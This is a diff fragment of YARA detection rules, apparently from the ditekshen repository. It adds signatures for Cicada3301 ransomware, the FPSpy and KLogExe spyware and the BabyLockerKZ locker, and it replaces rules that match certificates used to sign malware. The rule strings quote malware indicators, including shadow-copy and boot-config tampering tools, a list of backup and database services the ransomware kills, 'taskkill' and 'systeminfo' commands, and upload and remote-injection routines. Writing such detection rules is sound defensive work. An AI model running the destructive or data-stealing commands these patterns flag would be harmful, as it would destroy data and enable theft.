+		logic_hash = "b8b7596bc8ae01b89742e17bd3dbfcc1e2fad486cc6ea19c8de813fc677509f4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bb58a3d322fd67122804b2924ad1ddc27016e11a"
-		importance = 20
+		clamav1 = "MALWARE.Win.Ransomware.Cicada3301"
+
+	strings:
+		$s1 = "cmd/Cchcp 65001 >nulnet view \\\\"
+		$s2 = "create_file_recovery"
+		$s3 = "ecnrypted_files_full"
+		$s4 = "get_excluded_directories"
+		$s5 = "collect_files_except"
+		$s6 = ".exe4d5a" ascii
+		$s7 = "-accepteula -s -d \"\" --" ascii
+		$s8 = "[*.exe*.EXE*.DLL*.ini*.inf*.pol*.cmd*.ps1*.vbs*.bat*.pagefile.sys*.hiberfil.sys*.drv" ascii
+		$s9 = "memtasveeamsvc$backupsqlvssmsexchangesql$mysqlmysql$sophosMSExchange" ascii
+		$s10 = "-DATA.txt" ascii
+		$s11 = /--no_(local|net|impl)/ fullword ascii
+		$c1 = "fsutil" ascii
+		$c2 = "iisreset" ascii
+		$c3 = "vssadmin" ascii
+		$c4 = "wmic" ascii
+		$c5 = "bcdedit" ascii
+		$c6 = "wevtutil" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DILA d.o.o." and pe.signatures [ i ] . serial == "02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 4 of ( $c* ) and 4 of ( $s* ) ) or ( all of ( $c* ) and 2 of ( $s* ) ) or 9 of them )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00D609B6C95428954A999A8A99D4F198Af : FILE
+rule DITEKSHEN_MALWARE_Win_Fpspy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "e1b732d2-24fd-5819-a26a-049a9a569089"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "FPSpy"
+		author = "ditekshen"
+		id = "39d3be12-1b06-57b1-b3c2-2cbd13a17b03"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5099-L5110"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11887-L11916"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62eecc7cf240b9de6e04a43413bbeb84b673e9d3f1c4d67ec4082c099c6a87db"
+		logic_hash = "c26736c7f056f3d13c58e724fda601e88468e2386852b072a37c6646fb5ef8f9"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "b1d8033dd7ad9e82674299faed410817e42c4c40"
-		importance = 20
+		clamav1 = "MALWARE.Win.Trojan.FPSpy"
+
+	strings:
+		$f1 = "[Analys_Spy]" wide
+		$f2 = "[DeletePoorDll]" wide
+		$f3 = "[DownloadProc]" wide
+		$f4 = "[DragWarp]" wide
+		$f5 = "[GetCoolDir]" wide
+		$f6 = "[JackSleep]" wide
+		$f7 = "[KillCmdExe]" wide
+		$f8 = "[PsDownProc]" wide
+		$f9 = "[PsUpProc]" wide
+		$f10 = "[ReadFileFromPacket]" wide
+		$f11 = "[RemoteDropExec]" wide
+		$f12 = "[RemoteExec]" wide
+		$f13 = "[RemoteInject]" wide
+		$f14 = "[SendHttpForUpload]" wide
+		$s1 = "MazeFunc" fullword ascii
+		$s2 = /(Exit|Update|Drop)_EVT/ fullword ascii
+		$s3 = "Key.dat" fullword ascii
+		$s4 = "%sSysInfo_%02d_%02d_%02d.txt" fullword ascii
+		$s5 = "cmd /c systeminfo >> %s" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii
+		$s7 = "FPSpy" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fudl" and pe.signatures [ i ] . serial == "00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" )
+		uint16( 0 ) == 0x5a4d and ( ( pe.exports ( "MazeFunc" ) and 2 of ( $f* ) and 1 of ( $s* ) ) or ( 6 of ( $f* ) and 1 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $f* ) ) or ( 8 of ( $f* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6A568F85De2061F67Ded98707D4988Df : FILE
+rule DITEKSHEN_MALWARE_Win_Klogexe : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "ed8748ce-cd90-527b-a58e-da9c7164ed18"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects KLogExe"
+		author = "ditekshen"
+		id = "8c3ebc2c-717b-5c42-9233-274006d4331b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5112-L5123"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11918-L11937"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1aea9f6237cfbda49fea6d38ece935f9d4cc5abc678590c63b9a339aa37e104"
+		logic_hash = "1f1809b83dc468122022b68d63734ba1597c6fede01582c31d1700ca0b9e1e22"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "ed7e16a65294086fbdeee09c562b0722fdb2db48"
-		importance = 20
+		clamav1 = "MALWARE.Win.Trojan.KLogExe"
+
+	strings:
+		$s1 = "[clip_s]: %s" ascii
+		$s2 = "------ %d/%d/%d : %d/%d ------" ascii
+		$s3 = "[RWin+]" ascii
+		$s4 = "[Too many clip_tail]" ascii
+		$s5 = "name=\"userfile\"; filename=\"%s\"" ascii
+		$s6 = "Origin: http://" wide
+		$s7 = "%s_%d_%d_%d_%d" wide
+		$s8 = "/wp-content/include.php?_sys_" wide
+		$s9 = "\\desktops.ini" wide
+		$s10 = "KLogExe" wide nocase
+		$s11 = "dynamic_import.cpp [resolve_call] can`nt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Apladis" and pe.signatures [ i ] . serial == "6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F90E68Cbf92Fd7Ad409E281C3F2A0F0A : FILE
+rule DITEKSHEN_MALWARE_Win_Babylockerkz : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "e92daa7b-2d8a-5806-840e-678a9aa24fef"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects BabyLockerKZ"
+		author = "ditekshen"
+		id = "faa35818-2bed-528f-a6f0-5356a723ef5b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5125-L5137"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11939-L11957"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "d79a8f491c0112c3f26572350336fe7d22674f5550f37894643eba980ae5bd32"
-		logic_hash = "ca8d80a446df0c28e9fb4944bd69d9fa008be968c449e5a469b182fbf8744a3f"
+		logic_hash = "423bbd3b23591608a32e4e724c156fbaa5d1d087515137a82a0aeb8c4865d1ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c202564339ddd78a1ce629ce54824ba2697fa3d6"
-		importance = 20
+
+	strings:
+		$s1 = ":\\locker\\bin\\stub_win_x64_encrypter.pdb" ascii
+		$s2 = "taskkill /f /im explorer.exe" fullword wide
+		$s3 = "\\SysWOW64\\cmd.exe /c %windir%\\" wide
+		$s4 = "[!] Failed to RunNonElevated: %s, error 0x%X" fullword wide
+		$s5 = "[!] Failed to run sync command: %s, error 0x%X" fullword wide
+		$s6 = "[-] RunNonElevated: %s" fullword wide
+		$s7 = "[!][Encrypt] Not" fullword
+		$s8 = "[-] sALLUSERSPROFILE: %s" fullword wide
+		$s9 = "[!] WNetGetConnection failed 0x%X" fullword wide
+		$s10 = "[!][Scan] " wide
+		$s11 = "[-] Start encrypt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SUCK-MY-DICK-ESET" and pe.signatures [ i ] . serial == "f9:0e:68:cb:f9:2f:d7:ad:40:9e:28:1c:3f:2a:0f:0a" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7Ddd3796A427B42F2E52D7C7Af0Ca54F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_56203Db039Adbd6094B6A142C5E50587 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2619669f-cceb-5177-9738-d28236e1344e"
+		id = "b3e56f78-e79a-52e3-b29e-1f566946609e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5139-L5150"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3-L14"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "15df43212a842936e2ea0d834797f11fe80af3d376a19aa9a806aa6ed793e679"
+		logic_hash = "38380bc1a22b8d0fe851f76d2ecadba638f10b01873be44766124fb738e23d71"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b5cd5a485dee4a82f34c98b3f108579e8501fdea"
+		thumbprint = "e438c77483ecab0ff55cc31f2fd2f835958fad80"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fobos" and pe.signatures [ i ] . serial == "7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bccabdacabbdcda" and pe.signatures [ i ] . serial == "56:20:3d:b0:39:ad:bd:60:94:b6:a1:42:c5:e5:05:87" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_17D99Cc2F5B29522D422332E681F3E18 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_B5F34B7C326C73C392B515Eb4C2Ec80E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "98493d50-2bee-50a5-93f3-851559c494a6"
+		id = "f5d19333-4aee-52d3-aeac-822b39ec653a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5152-L5163"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L16-L27"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "95116d1114239795707b310afea3122d274dac471546de1e0147992d1f3a1d4f"
+		logic_hash = "553ef777cb7a93934caa53cc9acdc37fc4cbe2a28ae320f4a7f10b2a4073d675"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "969932039e8bf3b4c71d9a55119071cfa1c4a41b"
+		thumbprint = "9d35805d6311fd2fe6c49427f55f0b4e2836bbc5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PKV Trading ApS" and pe.signatures [ i ] . serial == "17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdaadbffbaedaabbdedfdbfebf" and pe.signatures [ i ] . serial == "b5:f3:4b:7c:32:6c:73:c3:92:b5:15:eb:4c:2e:c8:0e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_02De1Cc6C487954592F1Bf574Ca2B000 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0A1Dc99E4D5264C45A5090F93242A30A : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "1dc1b576-34f4-5017-8340-c6f58692a31c"
+		id = "8efea9da-a3ae-5af3-83b2-cac5baa4fa89"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5165-L5176"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L29-L40"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5963377fee755a859bc4330a1094ea1c8b2b588133706a22f67c1fb85542e64f"
+		logic_hash = "cb230503e17e93f78b04723c32d7ce66bdf146846e0208d268eebc0e446a6917"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e35804bbf4573f492c51a7ad7a14557816fe961f"
+		thumbprint = "17680b1ebaa74f94272957da11e914a3a545f16f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orca System" and pe.signatures [ i ] . serial == "02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "K & D KOMPANI d.o.o." and pe.signatures [ i ] . serial == "0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_142Aac4217E22B525C8587589773Ba9B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0D53690631Dd186C56Be9026Eb931Ae2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "86ef1337-71cc-5231-a31c-8d8a8d95873f"
+		id = "f0afbdf4-68db-522f-95d7-cd76aa7b9710"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5178-L5188"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L42-L53"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a0abe691c6b0a7be8ceea313068a6943d611b1424a1a03e43b82239ddfe9cbd2"
+		logic_hash = "645c2340fe7e7ce992f3f655d5058834d0df6a64ea20ef7794893a592124c55e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b15a4189dcbb27f9b7ced94bc5ca40b7e62135c3"
+		thumbprint = "c5d1e46a40a8200587d067814adf0bbfa09780f5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4026D6291F1Ac7Cf86C2C81172Cfb200 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "ea11705d-37a1-5050-b01a-b7fc523c675a"
+		id = "836af706-3a82-5aaf-9a96-244eef5820b2"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5218-L5229"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L55-L66"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c821f288bb6555e3955dfccf02edde2448f0499942eea24c488a6426985bff74"
+		logic_hash = "495ec6dbfdec3f608e387280e2d34093bb4965f5ada7c101e3119ae970eaf80d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2ae4328db08bac015d8965e325b0263c0809d93e"
+		thumbprint = "08fc56a14dcdc9e67b9a890b65064b8279176057"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MztxUCVYqnxgsyqVryViRnMfHFYBgyVMXkXuVGqmyPx" and pe.signatures [ i ] . serial == "40:26:d6:29:1f:1a:c7:cf:86:c2:c8:11:72:cf:b2:00" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pivo ZLoun s.r.o." and pe.signatures [ i ] . serial == "fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B0A308Fc2E71Ac4Ac40677B9C27Ccbad : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "207aa920-528c-5fa2-a8d4-4a44da4c870e"
+		id = "9a228e0e-256b-547d-af6d-960089f2f803"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5231-L5242"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L68-L79"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a71c47475327fb6268db34cd9d47451090fa3e673accfa905d32ebfb35f11e40"
+		logic_hash = "7e53dcd2e10285f710f1fb2355d77db3507ce346e8d0f26843ca8df2271a6e9e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "15e502f1482a280f7285168bb5e227ffde4e41a6"
+		thumbprint = "498d63bf095195828780dba7b985b71ab08e164f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Volpayk LLC" and pe.signatures [ i ] . serial == "00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foxstyle LLC" and pe.signatures [ i ] . serial == "32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_009Ecaa6E28E7615Ef5A12D87E327264C0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "8fd9f4e8-4ec3-5731-8032-e2657ee229ca"
+		id = "89006ac2-5cbc-5e7f-9ca6-51316b8d4bfd"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5244-L5255"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L81-L92"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24858027f62fd057c06dbf58b4a6e1e5f1dcd9429676232a8e66d231e713f56a"
+		logic_hash = "aed6c65f9c6400c0cc94386be684d3b9dd8d7637f9798fb49f4f651cf28b2d12"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "50899ef5014af31cd54cb9a7c88659a6890b6954"
+		thumbprint = "a758d6799e218dd66261dc5e2e21791cbcccd6cb"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HaqMkgGQmnNHpFsQmzMRDcavkPBzOcvMatDmcLHuDNoiQWMqj" and pe.signatures [ i ] . serial == "00:9e:ca:a6:e2:8e:76:15:ef:5a:12:d8:7e:32:72:64:c0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orangetree B.V." and pe.signatures [ i ] . serial == "7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_19985190B09206952Efd412D3Ccc18E2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0095E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "bd94cfd0-adaa-5e37-880e-8ef50328499d"
+		id = "94878b56-5b29-55a8-a8ec-7ace588e34ef"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5257-L5268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L94-L105"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6db1aaabd9a257e863a5ff771a736b705391602f7f5e2b799f8c47d3ae566f0f"
+		logic_hash = "b1f8867b47c1bec43b3603af343d6d5728ec218a66863a6777c0ee59ae1faa98"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "49ec0580239c07da4ffba56dc8617a8c94119c69"
+		thumbprint = "6acdfee2a1ab425b7927d0ffe6afc38c794f1240"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "cwcpbvBhYEPeJYcCNDldHTnGK" and pe.signatures [ i ] . serial == "19:98:51:90:b0:92:06:95:2e:fd:41:2d:3c:cc:18:e2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kommservice LLC" and pe.signatures [ i ] . serial == "00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_03B27D7F4Ee21A462A064A17Eef70D6C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00C167F04B338B1E8747B92C2197403C43 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "96920ba8-b6d6-5cf4-9a3c-cb6f5c9b3048"
+		id = "d838e09b-e2f2-585a-a33d-bfe34f989e77"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5270-L5281"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L107-L118"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53a4c4474b1add510624e23eac642e8cba145248d72a2ffc37d0aca141a041c2"
+		logic_hash = "008fe748c7956c1885c7d7e3a843d2310c17b7552dbbe9b4750809a5642d7ca6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a278b5c8a9798ee3b3299ec92a4ab618016628ee"
+		thumbprint = "7af7df92fa78df96d83b3c0fd9bee884740572f9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CCL TRADING LIMITED" and pe.signatures [ i ] . serial == "03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_66F98881Fbb02D0352Bef7C13Bd61Df2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fc7065Abf8303Fb472B8Af85918F5C24 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "9cc569f4-1686-5f17-99a4-90750023d519"
+		id = "d8c25f8a-e129-5cd4-9e60-d2e7ebbb1ea6"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5283-L5294"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L120-L131"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "f265524fb9a4a58274dbd32b2ed0c3f816c5eff05e1007a2e7bba286b8ffa72c"
-		logic_hash = "3d70da3f644a90bc6e7b405a41225a328d7007187525a0b277f0fc1136be8b5b"
+		logic_hash = "8ce0d25ef802948f754f155010f42d76256895ebd6ffdce8d97063dada58e668"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "722eee34153fc67ea7abdcb0c6e9e54479f1580e"
+		thumbprint = "b61a6607154d27d64de35e7529cb853dcb47f51f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "66:f9:88:81:fb:b0:2d:03:52:be:f7:c1:3b:d6:1d:f2" )
